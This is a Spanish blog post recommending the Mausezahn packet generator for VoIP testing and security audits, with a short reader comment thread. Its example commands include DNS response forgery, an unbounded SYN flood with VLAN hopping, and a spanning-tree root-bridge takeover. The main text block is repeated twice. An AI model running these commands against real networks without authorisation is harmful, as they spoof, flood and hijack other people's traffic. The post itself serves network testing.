Mausezahn (en alemán "dientes de ratón") es un generador de tráfico escrito en C para Linux, muy versátil y rápido, que nos permitirá generar y enviar prácticamente todos los paquetes posibles (e imposibles) con una sintaxis bastante sencilla.
Es open source bajo licencia GPLv2 y principalmente se utiliza para probar VoIP o redes multicast, aunque también puede usarse en auditorías de seguridad para chequear si los sistemas están suficientemente fortificados o, en mi caso, como otra interesante herramienta para comprobar los IDS, SIEM y demás elementos de seguridad perimetral.
Algunos ejemplos incluidos en la web de su autor demuestran su sencillez de uso y el porqué de nuestra recomendación para utilizarla:
- Enviar una secuencia arbitraria de bytes a través de la tarjeta de red 1000 veces (frames no válidos, runt):
# mz eth0 -c 1000 \ "ff:ff:ff:ff:ff:ff ff:ff:ff:ff:ff:ff cc:dd 00:00:00:ca:fe:ba:be"
- Enviar una respuesta DNS falsificada al host 192.168.1.2 (DNS forgery):
# mz eth0 -A 10.7.7.42 -B 192.168.1.2 \ -t dns "q=www.thehostyouseek.com, a=172.16.6.66"
- Realizar un ataque TCP SYN-Flood contra los puertos well-known de la red 10.5.5.0/24 en la VLAN 100 desde la VLAN 50 (VLAN-hopping):
# mz eth0 -c 0 -Q 50,100 -A rand -B 10.5.5.0/25 \ -t tcp "flags=syn, dp=1-1023"
- Actuar como un bridge root para interferir en el protocolo spanning tree generando BPDUs el Bridge ID más bajo cada 2 segundos:
# mz eth0 -c 0 -d 2s -t bpdu
Incluso con soporte PVST+ de Cisco:
# mz eth0 -c 0 -d 2s -t bpdu vlan=314
- Medir el jitter de nuestras conexiones de voz sobre IP:
TX# mz eth0 -t rtp -B rx.somewhere.net RX# mz eth0 -T rtp "log, path=/tmp"
- Utilizar un modo interactivo y multihilo:
# mz -x 99 telnet localhost 99
¡Esto y mucho más con Mausezahn!
Es open source bajo licencia GPLv2 y principalmente se utiliza para probar VoIP o redes multicast, aunque también puede usarse en auditorías de seguridad para chequear si los sistemas están suficientemente fortificados o, en mi caso, como otra interesante herramienta para comprobar los IDS, SIEM y demás elementos de seguridad perimetral.
Algunos ejemplos incluidos en la web de su autor demuestran su sencillez de uso y el porqué de nuestra recomendación para utilizarla:
- Enviar una secuencia arbitraria de bytes a través de la tarjeta de red 1000 veces (frames no válidos, runt):
# mz eth0 -c 1000 \ "ff:ff:ff:ff:ff:ff ff:ff:ff:ff:ff:ff cc:dd 00:00:00:ca:fe:ba:be"
- Enviar una respuesta DNS falsificada al host 192.168.1.2 (DNS forgery):
# mz eth0 -A 10.7.7.42 -B 192.168.1.2 \ -t dns "q=www.thehostyouseek.com, a=172.16.6.66"
- Realizar un ataque TCP SYN-Flood contra los puertos well-known de la red 10.5.5.0/24 en la VLAN 100 desde la VLAN 50 (VLAN-hopping):
# mz eth0 -c 0 -Q 50,100 -A rand -B 10.5.5.0/25 \ -t tcp "flags=syn, dp=1-1023"
- Actuar como un bridge root para interferir en el protocolo spanning tree generando BPDUs el Bridge ID más bajo cada 2 segundos:
# mz eth0 -c 0 -d 2s -t bpdu
Incluso con soporte PVST+ de Cisco:
# mz eth0 -c 0 -d 2s -t bpdu vlan=314
- Medir el jitter de nuestras conexiones de voz sobre IP:
TX# mz eth0 -t rtp -B rx.somewhere.net RX# mz eth0 -T rtp "log, path=/tmp"
- Utilizar un modo interactivo y multihilo:
# mz -x 99 telnet localhost 99
¡Esto y mucho más con Mausezahn!
¿me puede servir paragenerar trafico a una web propia?
ResponderEliminarpodría, pero si lo que quieres es aumentar las visitas de tu sitio existen otras herramientas más adecuadas...
EliminarQue herramientas se utilizarian
ResponderEliminarNo es lo que busco, pero me puede servir para algo, así que se agradece la buena información.....
ResponderEliminar